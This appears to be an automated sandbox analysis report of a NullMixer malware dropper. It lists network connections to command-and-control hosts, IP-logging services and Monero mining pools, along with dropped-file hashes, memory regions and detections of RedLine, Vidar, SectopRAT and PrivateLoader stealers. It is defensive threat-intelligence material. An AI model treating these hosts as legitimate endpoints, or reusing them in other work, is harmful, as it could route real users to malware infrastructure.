| US | 8.8.8.8:53 | 41.13.2.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 172.67.75.166:443 | api.db-ip.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.75.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| N/A | 127.0.0.1:63098 | tcp | |
| N/A | 127.0.0.1:63100 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.28.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.11.8:80 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | 215.133.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| DE | 51.195.43.17:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | 17.43.195.51.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 146.59.154.106:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.154.59.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/3016-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-44-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3016-43-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3016-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-38-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-37-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-36-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-40-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-34-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3016-33-0x0000000064941000-0x000000006494F000-memory.dmp
memory/3016-32-0x00000000013F0000-0x000000000147F000-memory.dmp
memory/3016-31-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3016-27-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
memory/4800-97-0x0000000000F60000-0x0000000000F8C000-memory.dmp
memory/3252-100-0x00000000002F0000-0x00000000003DE000-memory.dmp
memory/4800-103-0x0000000003110000-0x0000000003130000-memory.dmp
memory/1000-104-0x0000000000800000-0x0000000000942000-memory.dmp
memory/1000-107-0x0000000005260000-0x00000000052F2000-memory.dmp
memory/1000-106-0x0000000005770000-0x0000000005D14000-memory.dmp
memory/4800-105-0x0000000003140000-0x0000000003146000-memory.dmp
memory/1000-108-0x0000000005200000-0x000000000520A000-memory.dmp
memory/1000-109-0x0000000005590000-0x000000000562C000-memory.dmp
memory/4800-99-0x0000000003100000-0x0000000003106000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
memory/4876-80-0x0000000000A70000-0x0000000000A78000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSCC3E6BB7\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/1320-129-0x00000000020A0000-0x0000000002184000-memory.dmp
memory/1004-120-0x0000000000CA0000-0x0000000000CB0000-memory.dmp
memory/3640-143-0x0000000000400000-0x00000000004E4000-memory.dmp
memory/3016-150-0x0000000000400000-0x0000000000A07000-memory.dmp
memory/3016-159-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3016-158-0x0000000064940000-0x0000000064959000-memory.dmp
memory/3016-157-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/3016-156-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3016-154-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/3312-160-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/1000-161-0x0000000004CB0000-0x0000000004CC2000-memory.dmp
memory/2380-171-0x0000000000400000-0x0000000003346000-memory.dmp
memory/3640-172-0x0000000000770000-0x000000000084D000-memory.dmp
memory/1004-175-0x0000000001A90000-0x0000000001AA2000-memory.dmp
memory/1004-174-0x0000000001A60000-0x0000000001A6E000-memory.dmp
memory/1000-188-0x000000000A2A0000-0x000000000A32C000-memory.dmp
memory/1000-189-0x0000000006F20000-0x0000000006F3E000-memory.dmp
memory/4760-190-0x0000000000400000-0x000000000041E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1cr.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
| MD5 | a628baa97881fa5528009c9470cadee0 |
| SHA1 | 583aa730e302fe0015cdb0dee4e279f193d66d87 |
| SHA256 | e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5 |
| SHA512 | c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf |
memory/4760-199-0x0000000005860000-0x0000000005E78000-memory.dmp
memory/4760-200-0x00000000052A0000-0x00000000052B2000-memory.dmp
memory/4760-201-0x0000000005340000-0x000000000537C000-memory.dmp
memory/2656-202-0x00000000048E0000-0x0000000004916000-memory.dmp
memory/2656-204-0x0000000004F60000-0x0000000005588000-memory.dmp
memory/4760-203-0x0000000005380000-0x00000000053CC000-memory.dmp
memory/2656-207-0x0000000005770000-0x00000000057D6000-memory.dmp
memory/2656-206-0x0000000005700000-0x0000000005766000-memory.dmp
memory/2656-205-0x0000000004F20000-0x0000000004F42000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4xfsz0p.s1q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4760-219-0x00000000055E0000-0x00000000056EA000-memory.dmp
memory/2656-220-0x00000000058E0000-0x0000000005C34000-memory.dmp
memory/2656-221-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS76B2.tmp\Install.cmd
| MD5 | a3c236c7c80bbcad8a4efe06a5253731 |
| SHA1 | f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07 |
| SHA256 | 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d |
| SHA512 | dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc |
memory/2656-223-0x0000000006480000-0x00000000064B2000-memory.dmp
memory/2656-224-0x0000000073EB0000-0x0000000073EFC000-memory.dmp
memory/2656-234-0x00000000064C0000-0x00000000064DE000-memory.dmp
memory/2656-235-0x00000000070C0000-0x0000000007163000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e443ee4336fcf13c698b8ab5f3c173d0 |
| SHA1 | 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a |
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
| SHA512 | cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd |
memory/2656-242-0x0000000007820000-0x0000000007E9A000-memory.dmp
memory/2656-243-0x00000000071E0000-0x00000000071FA000-memory.dmp
memory/2656-244-0x0000000007250000-0x000000000725A000-memory.dmp
memory/2656-250-0x0000000007460000-0x00000000074F6000-memory.dmp
\??\pipe\LOCAL\crashpad_4092_YTVGSEXPLPVIISPH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56a4f78e21616a6e19da57228569489b |
| SHA1 | 21bfabbfc294d5f2aa1da825c5590d760483bc76 |
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
| SHA512 | c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2e613877ba30067611bb2c2e1e8c02eb |
| SHA1 | 3e5528270361b8c0e22a97e80db1da62a4a1a469 |
| SHA256 | b23176c536f1299706fe85369e026a879fcf98bf8fc8381be77dec95c6605a6b |
| SHA512 | 849c3e758963994ebe001e10aba8662022a0be15596180772f21c060936f118c4e46f86f62ab7f0f780111e9fc1516925144bb9d5de72490f849bd4de6d9b872 |
memory/2656-262-0x00000000073E0000-0x00000000073F1000-memory.dmp
memory/2656-263-0x0000000007410000-0x000000000741E000-memory.dmp
memory/2656-264-0x0000000007420000-0x0000000007434000-memory.dmp
memory/2656-265-0x0000000007520000-0x000000000753A000-memory.dmp
memory/2656-266-0x0000000007500000-0x0000000007508000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | acb4fa771a71663077ce1b9eac1bab3a |
| SHA1 | 797008a96ec3e23ec74289d49ae9120028045070 |
| SHA256 | 366c2581a3ce28374993d73565640180a949078578d9b9b895dffdcb218f979e |
| SHA512 | 15100fe991300e962749bb2c7d41106963c00c6cf0b1488efb4f4e14edeb3744422e19399a83200fe94b7953f5297f9c44fa92b1ad1070b57bd7a6bce45dcb32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9ab891abd4504574742cc01b982add54 |
| SHA1 | 45f1cb1d9a537e94662093e7b5f55c16fd6b2bf2 |
| SHA256 | 1c3c8c2a8c254349999ef71657ae94efdbabf12f2a31ac29bd0b45f55e1b9242 |
| SHA512 | 9d0b46a56dfb4f0538ffa04e3e08a567c426e2408f0123e93a77b44f9761042f2c4b72495add71240840d52bd6ade7699fa1a72f4f2e2a07bc24fb854908a979 |
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | be0b4b1c809dc419f44b990378cbae31 |
| SHA1 | 5c40c342e0375d8ca7e4cc4e1b81b7ef20a22806 |
| SHA256 | 530bd3b9ec17f111b0658fddeb4585cd6bf6edb1561bdebd1622527c36a63f53 |
| SHA512 | 5ce316cfe5e25b0a54ceb157dee8f85e2c7825d91a0cd5fae0500b68b85dd265903582728d4259428d2e44b561423dac1499edcf0606ac0f78e8485ce3c0af24 |
memory/5444-315-0x0000000000140000-0x0000000000146000-memory.dmp
memory/5580-318-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-319-0x0000000000890000-0x00000000008B0000-memory.dmp
memory/5580-317-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-321-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-325-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-324-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-323-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-322-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-326-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-327-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5580-347-0x0000000140000000-0x0000000140786000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 4bc8a3540a546cfe044e0ed1a0a22a95 |
| SHA1 | 5387f78f1816dee5393bfca1fffe49cede5f59c1 |
| SHA256 | f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca |
| SHA512 | e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win7-20240903-en
Max time kernel
56s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSC38EDBB6\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
